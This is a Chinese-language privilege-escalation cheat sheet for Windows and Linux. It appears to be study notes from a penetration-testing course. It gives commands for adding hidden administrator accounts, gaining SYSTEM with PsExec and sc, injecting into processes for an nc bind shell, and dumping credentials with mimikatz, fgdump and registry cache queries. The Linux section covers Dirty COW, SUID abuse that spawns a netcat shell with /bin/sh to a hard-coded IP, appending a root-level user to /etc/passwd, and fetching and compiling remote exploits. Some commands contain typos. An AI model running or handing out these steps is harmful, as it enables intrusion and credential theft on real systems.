提權
- 計算機中的權限
- 常見指令
-
- whidows
- Linux
- 基于密碼破解提權
-
- windows
- linux
- Windows提權
-
- SysinternalsSuite->PsExec.exe
- 利用系統指令
- 程序注入pinjector.exe(隐蔽)
- fgdump
- mimikatz
- win緩存密碼
- Linux提權
-
- 髒牛
- suid提權
- /etc/passwd檔案權限配置不當
- sudo組
- searchsploit
- etc/crontab提權
- 漏洞庫
計算機中的權限
計算機常見的權限:
- 匿名通路權限
- 來賓權限
- 使用者權限
- 管理者權限
- 系統權限
常見提權方面
- webshell 提權
- 執行指令,本地溢出,資訊收集,軟體提權
- 資料庫提權
- 執行指令,越權替換
- 普通使用者提權
- 本地溢出,資訊收集,軟體漏洞,越權替換
常見指令
whidows
- query user :檢視使用者登入情況
- whoami :檢視目前使用者權限
- systeminfo: 檢視目前系統版本與更新檔
- net user aaa bbb /add : 添加使用者名aaa,密碼為bbb
- net localgroup administrators aaa /add:将使用者aaa添加到管理者組
- net localgroup ”Remote Desktop Users“ aaa /add :添加使用者到遠端桌面連接配接組
- ipconfig:網卡資訊
- netstat -ano :端口資訊
- tasklist :檢視程序占用的端口
- taskkill /im 程式名.exe /f:強制結束指定程序
- hostname:主機名
- set :環境變量
檢視服務pid号
- tasklist /svc | find “Termservice”
- netstat -ano| find “1488”
- wmic os get caption:檢視系統名
- wmic qfe get Description,HstFixID,InstalledOn:檢視更新檔資訊
- wmic product get name , version :檢視系統安裝程式
Linux
linux提權指令詳解
- 檢視系統版本資訊
- 檢視發行版:
- cat /etc/issue
- cat /etc/*-release
- 檢視核心版本
- uname -a
- lsb-release -a
- 檢視發行版:
基于密碼破解提權
windows
手法
- 中間人劫持:網絡竊聽
- 使用者主機竊聽:鍵盤記錄
- 簡單猜測:常用密碼
- 系統漏洞:永恒之藍
- 資訊洩露:git,配置檔案
- 系統後門:shift後門
密碼結構
使用者名:RID:LM-HASH值:NT-HASH值
https://www.cmd5.com/ HASH破解
密碼擷取
- 導出SAM,system檔案
- 利用工具 ,gethash,pwdump,wce等
密碼破解 :
- ophcrack彩虹表,saminside字典 密文密碼破解
- wce ,mimikatz,getpass等明文密碼擷取
linux
使用者資訊 :
/etc/passwd
root : x : 0 : 0 : root : /root : /bin/bash
密碼資訊:/etc/shadow
linux常用加密方法:
- $1 :MD5
- $2 :blowdfish
- $5 :sha-256
- $6 :sha-512
本地提權計算機中的權限常見指令基于密碼破解提權Windows提權Linux提權漏洞庫
密碼破解 : john工具
Windows提權
- 核心提權:ms09-012(pr提權)
- 資料庫提權:mysql,sql server
- 應用提權:ftp
密碼收集:
- 系統資料庫
- 日志
- .rdp檔案
- 記憶體
- 配置檔案
- sam檔案
常見window權限:
普通使用者:user
管理者:administrator
系統:system
admin->system
SysinternalsSuite->PsExec.exe
微軟釋出的一套非常強大的免費工具程式集
PsExec.exe -i -s cmd
彈出一個system權限終端
利用此方法将整個桌面提升至system權限
用系統權限開啟任務管理器,利用任務管理器開啟桌面程序
利用系統指令
win03,xp
at 22:22 /interactive cmd (win03,xp)
同樣到時間會彈出system權限終端
win7
sc Create name binPath= "cmd /k start" type= own type= interact
sc start name (win 7)
程序注入pinjector.exe(隐蔽)
pinjector.exe l 檢視程序pid
pinjector.exe -p pid cmd port
nc -nv ip port
先檢視程序pid
或者任務管理器
找到services.exe的pid
fgdump
kali工具:usr/share/windows-binaries/fgdump
讀取使用者名密碼(NTLM)
mimikatz
kali工具:/usr/share/windows-resources/mimikatz
簡單使用
::(help)
privilege::debug(提權)
sekurlsa::logonPasswords(賬号密碼)
process(程序)
service(服務)
提權
讀取密碼(隻能讀取以登入的使用者)
win緩存密碼
reg query HKEY_LOCAL_MACHINE\SECURITY\CACHE
Linux提權
- 程式劫持:cve-2016-1531
- 密碼:記憶體讀取密碼,本地檔案配置,曆史記錄
- sudo
- 核心提權:髒牛
- NFS:檔案挂載權限
- cron:路徑+自動運作,通配符,檔案修改,啟動項提權
- 檔案權限
方法
- wget http://ip/exp.c
- gcc -o exp exp
- chomd +x exp
- ./exp
linux分析工具 : Linux Exploit Suggester
權限:
- 普通使用者:user
- 管理者:root
髒牛
原理
替換/etc/passwd檔案下的root使用者為firefart
編譯
gcc dirtycow.c -pthread -o dirtycow -lcrpty
suid提權
suid提權:以檔案擁有者身份執行指令
查找具有root權限的suid檔案
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;
執行指令
touch filename
find filename -exec whoami \;
反彈root終端
find filename -exec nc -lvp 1234 -e /bin/sh \;
nc -nv 192.168.238.158 1234
/etc/passwd檔案權限配置不當
etc/passwd檔案權限配置不當
生成密碼
perl -le ‘print crypt('pass','aa')’
将使用者名密碼追加到passwd下
echo 'abcd:aaW3cJZ7OSoQM:0:0:dirty:/root:/bin/bash '>> /etc/passwd
sudo組
一些普通使用者在sudo組中可以直接
su sudo user 提權
searchsploit
cat /etc/issue
searchsploit ubuntu 12.04
開啟apache将腳本下載下傳至靶機編譯運作
etc/crontab提權
etc/crontab檔案用于配置生成一個定時任務。當使用者對此檔案更改時,可以利用添加任務修改bin/sh的執行權限以達到提權目的
漏洞庫
https://www.exploit-db.com/ 漏洞庫
https://github.com/SecWiki/windows-kernel-exploits windows提權漏洞集合
https://github.com/SecWiki/linux-kernel-exploits linux提權漏洞集合
https://github.com/SecWiki/macos-kernel-exploits macos提權漏洞集合